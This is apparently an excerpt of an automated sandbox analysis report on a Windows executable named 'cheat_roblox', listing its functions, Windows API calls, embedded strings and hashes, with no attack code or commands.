                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                  • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                                                                                  • API String ID: 3215553584-2617248754
                                                                                                                  • Opcode ID: ca8329083cbd7a022b2adefca7a3bb58d0ae1dff90efa4c28dbe4d3f14657870
                                                                                                                  • Instruction ID: 1283ce6f78ff32351ed9c7e6b5803f2626c6d9e352949105e95d2912855fa38b
                                                                                                                  • Opcode Fuzzy Hash: ca8329083cbd7a022b2adefca7a3bb58d0ae1dff90efa4c28dbe4d3f14657870
                                                                                                                  • Instruction Fuzzy Hash: 43419073A05B4699E700CF25E8517E933A4FB18394F014136DEAC87B94EE3ED026C349
                                                                                                                  Function 00007FF6E7E3F390 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$ButtonCheckedObject$ClassDeleteLongName
                                                                                                                  • String ID: STATIC
                                                                                                                  • API String ID: 781704138-1882779555
                                                                                                                  • Opcode ID: 028936735c5caa7e1c5955390d3996a5d13f8d6e72d7f98742e6e6c768b0ab82
                                                                                                                  • Instruction ID: d8ec510eb0e12ca0583979adb8ec3cc62605bed34936e057414a3d95dbdea7a2
                                                                                                                  • Opcode Fuzzy Hash: 028936735c5caa7e1c5955390d3996a5d13f8d6e72d7f98742e6e6c768b0ab82
                                                                                                                  • Instruction Fuzzy Hash: B531A537B0864396FA64AB11E5187BA2391BF89BC4F000430DDED87BA6DF3ED4068746
                                                                                                                  Function 00007FF6E7E36E80 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 204memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$AllocGlobal
                                                                                                                  • String ID: </html>$<html>$<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                                                  • API String ID: 2721297748-1533471033
                                                                                                                  • Opcode ID: 99020ba5446ec8b5071b5be278ebc62a02c6a64c5a04705e5c2bdc59161e89ed
                                                                                                                  • Instruction ID: f9410194fa001c537cd0a0b079f38e1fa6af29dbbab8700a63f848eb168e4552
                                                                                                                  • Opcode Fuzzy Hash: 99020ba5446ec8b5071b5be278ebc62a02c6a64c5a04705e5c2bdc59161e89ed
                                                                                                                  • Instruction Fuzzy Hash: E5819D63B18A4695FB00DBB5D8443ED3371AF48788F404135CEAD976AAEE3ED50AC349
                                                                                                                  Function 00007FF6E7E3AE90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Item$Text
                                                                                                                  • String ID: LICENSEDLG
                                                                                                                  • API String ID: 1601838975-2177901306
                                                                                                                  • Opcode ID: 35fefc179f922e98870b8a3b257cf5e504c5ed53f195972dc606f5139ed8380b
                                                                                                                  • Instruction ID: 4e6ed49b82a9602003dc4f451ffa3ceb43ade17a904ef75a175fb1776073838e
                                                                                                                  • Opcode Fuzzy Hash: 35fefc179f922e98870b8a3b257cf5e504c5ed53f195972dc606f5139ed8380b
                                                                                                                  • Instruction Fuzzy Hash: 4741C423F08A5282F714CB11E8587792361AF84F84F140135DAAE87BE5CF3FE585830A
                                                                                                                  Function 00007FF6E7E2B9B4 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 84libraryloaderCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$CurrentDirectoryProcessSystem
                                                                                                                  • String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
                                                                                                                  • API String ID: 2915667086-2207617598
                                                                                                                  • Opcode ID: d2e93635ec338890dfe438c4789fcaf7e26687fbfe6c7ce53d5981307f2d6baa
                                                                                                                  • Instruction ID: 074e4a62be96673d3816a6c17b76280d63dec6c27598c4a49763130efed55f95
                                                                                                                  • Opcode Fuzzy Hash: d2e93635ec338890dfe438c4789fcaf7e26687fbfe6c7ce53d5981307f2d6baa
                                                                                                                  • Instruction Fuzzy Hash: 283157A2A09B8B80FA558B16F95037533A5AF54B90F054135CCFEC33A6EE3EE545834A
                                                                                                                  Function 00007FF6E7E387D8 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 415COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID: $
                                                                                                                  • API String ID: 3668304517-227171996
                                                                                                                  • Opcode ID: c3d23b65519d6b0e16bf2cf387636935753ce78294b0e94f23a44a4be1d6057b
                                                                                                                  • Instruction ID: f167652879d5e1988adc629d4eae7776d6a5148efcbb52f0b7014c4eced303ca
                                                                                                                  • Opcode Fuzzy Hash: c3d23b65519d6b0e16bf2cf387636935753ce78294b0e94f23a44a4be1d6057b
                                                                                                                  • Instruction Fuzzy Hash: EEF1F263F1574690EF009B69D4482BC2361AB44B98F805231CBBD977E5EF7EE580C39A
                                                                                                                  Function 00007FF6E7E457EC Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 317COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Is_bad_exception_allowedabortstd::bad_alloc::bad_alloc
                                                                                                                  • String ID: csm$csm$csm
                                                                                                                  • API String ID: 2940173790-393685449
                                                                                                                  • Opcode ID: 65edb01f61f21fff02eaccc9a46b43a233fa456fccf40e480b66f774ee54b1a7
                                                                                                                  • Instruction ID: b62cd418d691a566a76ee7a66806af24bbf6c897fe83277adce14ebf9e708833
                                                                                                                  • Opcode Fuzzy Hash: 65edb01f61f21fff02eaccc9a46b43a233fa456fccf40e480b66f774ee54b1a7
                                                                                                                  • Instruction Fuzzy Hash: 78E1A173A087828AE7209F24D4803AD77A0FB45758F150136DAED87695EF3DE486E70A
                                                                                                                  Function 00007FF6E7E24F38 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 158COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocClearStringVariant
                                                                                                                  • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                                                                  • API String ID: 1959693985-3505469590
                                                                                                                  • Opcode ID: a8b35b7bcd37d82ee4aaa20c3b876beaab518b1de9e1ce59ea14af8b32f1fe8d
                                                                                                                  • Instruction ID: b717b8edeef6fb24cfae4c22a0e2525ab3cf4376ef83816c4f41309b0cf53f76
                                                                                                                  • Opcode Fuzzy Hash: a8b35b7bcd37d82ee4aaa20c3b876beaab518b1de9e1ce59ea14af8b32f1fe8d
                                                                                                                  • Instruction Fuzzy Hash: FF713C37A14B4685EB20CF25E9806AD37B1FB88B98B045136EE9E83B64DF3ED544C345
                                                                                                                  Function 00007FF6E7E472EC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF6E7E474F3,?,?,?,00007FF6E7E4525E,?,?,?,00007FF6E7E45219), ref: 00007FF6E7E47371
                                                                                                                  • GetLastError.KERNEL32(?,?,00000000,00007FF6E7E474F3,?,?,?,00007FF6E7E4525E,?,?,?,00007FF6E7E45219), ref: 00007FF6E7E4737F
                                                                                                                  • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF6E7E474F3,?,?,?,00007FF6E7E4525E,?,?,?,00007FF6E7E45219), ref: 00007FF6E7E473A9
                                                                                                                  • FreeLibrary.KERNEL32(?,?,00000000,00007FF6E7E474F3,?,?,?,00007FF6E7E4525E,?,?,?,00007FF6E7E45219), ref: 00007FF6E7E473EF
                                                                                                                  • GetProcAddress.KERNEL32(?,?,00000000,00007FF6E7E474F3,?,?,?,00007FF6E7E4525E,?,?,?,00007FF6E7E45219), ref: 00007FF6E7E473FB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                  • String ID: api-ms-
                                                                                                                  • API String ID: 2559590344-2084034818
                                                                                                                  • Opcode ID: eedfc97f7024c66fbeb39a7219499b253e22696fd1fdab2c5f769bf1fd383016
                                                                                                                  • Instruction ID: 4ca938721c73baf5d914e8394023e7a943959a68a8099d30923a3c238605a17b
                                                                                                                  • Opcode Fuzzy Hash: eedfc97f7024c66fbeb39a7219499b253e22696fd1fdab2c5f769bf1fd383016
                                                                                                                  • Instruction Fuzzy Hash: 5D31E523A1A64281EE11EB16F8007792395FF04BA4F194535DDBD87394EF3DE046939A
                                                                                                                  Function 00007FF6E7E41604 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 43libraryloaderCOMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(?,?,?,00007FF6E7E41573,?,?,?,00007FF6E7E4192A), ref: 00007FF6E7E4162B
                                                                                                                  • GetProcAddress.KERNEL32(?,?,?,00007FF6E7E41573,?,?,?,00007FF6E7E4192A), ref: 00007FF6E7E41648
                                                                                                                  • GetProcAddress.KERNEL32(?,?,?,00007FF6E7E41573,?,?,?,00007FF6E7E4192A), ref: 00007FF6E7E41664
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                  • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                                  • API String ID: 667068680-1718035505
                                                                                                                  • Opcode ID: 4fe35f58cd4175722fa2f4edd42b7d77b08fa8d78ae8e9bf73ccac7c2071e7f8
                                                                                                                  • Instruction ID: 435f15d8338767dd563d081263dfafb43b618902bb902c8ea4d15985d9452f04
                                                                                                                  • Opcode Fuzzy Hash: 4fe35f58cd4175722fa2f4edd42b7d77b08fa8d78ae8e9bf73ccac7c2071e7f8
                                                                                                                  • Instruction Fuzzy Hash: 6F115B23A1AB06A1FE648B00FA4037423916F18794F4C4475C8BDC6790FE3EE486974B
                                                                                                                  Function 00007FF6E7E2ED24 Relevance: 9.1, APIs: 6, Instructions: 120timeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00007FF6E7E251A4: GetVersionExW.KERNEL32 ref: 00007FF6E7E251D5
                                                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6E7E15AB4), ref: 00007FF6E7E2ED8C
                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6E7E15AB4), ref: 00007FF6E7E2ED98
                                                                                                                  • SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6E7E15AB4), ref: 00007FF6E7E2EDA8
                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6E7E15AB4), ref: 00007FF6E7E2EDB6
                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6E7E15AB4), ref: 00007FF6E7E2EDC4
                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6E7E15AB4), ref: 00007FF6E7E2EE05
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Time$File$System$Local$SpecificVersion
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2092733347-0
                                                                                                                  • Opcode ID: 197518eb8103cda2bd6b54f1f5e99fa721289ee203340eaf45d2c62117a67569
                                                                                                                  • Instruction ID: c9ea732750420df2e2735b11fd8735c514c07c438c2a6aef0ad5ed68c515fb0a
                                                                                                                  • Opcode Fuzzy Hash: 197518eb8103cda2bd6b54f1f5e99fa721289ee203340eaf45d2c62117a67569
                                                                                                                  • Instruction Fuzzy Hash: EA518AB3B106568AEB04CFA8E4442AC37B1F748B88B60403ADE5D97B58DF3DE542C741
                                                                                                                  Function 00007FF6E7E2F010 Relevance: 9.1, APIs: 6, Instructions: 80timeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Time$File$System$Local$SpecificVersion
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2092733347-0
                                                                                                                  • Opcode ID: 93bf5fe4be91675a5f4cba4a2df0f2c5ed0bd126a165fd4d88c3e7d5e64543a6
                                                                                                                  • Instruction ID: 41acd19adc6a0e14f456f968d2c7b6dfeefd3ca01bdd3e7edc5f27b97cdf7ad2
                                                                                                                  • Opcode Fuzzy Hash: 93bf5fe4be91675a5f4cba4a2df0f2c5ed0bd126a165fd4d88c3e7d5e64543a6
                                                                                                                  • Instruction Fuzzy Hash: AB314867B10A528EFB04CFB5E8802AC3770FB08758B54502AEE5E93A58EF38D895C305
                                                                                                                  Function 00007FF6E7E27918 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 233COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID: .rar$exe$rar$sfx
                                                                                                                  • API String ID: 3668304517-630704357
                                                                                                                  • Opcode ID: ded382a5f33e5d00d019a19aa0952dad5d31072c5da8fffb523e0446b7f74fbf
                                                                                                                  • Instruction ID: e41cdf04960c3e88bf4a88a47334d51ac71e8e604b0fbb0c01fbaf163bb91c34
                                                                                                                  • Opcode Fuzzy Hash: ded382a5f33e5d00d019a19aa0952dad5d31072c5da8fffb523e0446b7f74fbf
                                                                                                                  • Instruction Fuzzy Hash: 2AA1C363A1468B80EB009B25E8453BC2361FF54BA8F501231DEBD876E9DF3EE555C389
                                                                                                                  Function 00007FF6E7E45CE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 191COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: abort$CallEncodePointerTranslator
                                                                                                                  • String ID: MOC$RCC
                                                                                                                  • API String ID: 2889003569-2084237596
                                                                                                                  • Opcode ID: 0f4c2d06ef2d655583c55900dbb020dcf620b12558a4295111afe460be181df6
                                                                                                                  • Instruction ID: cf4f4ad705a3865f642b9f99f0a74e517c42739ed1cbebbe559d2be38988b159
                                                                                                                  • Opcode Fuzzy Hash: 0f4c2d06ef2d655583c55900dbb020dcf620b12558a4295111afe460be181df6
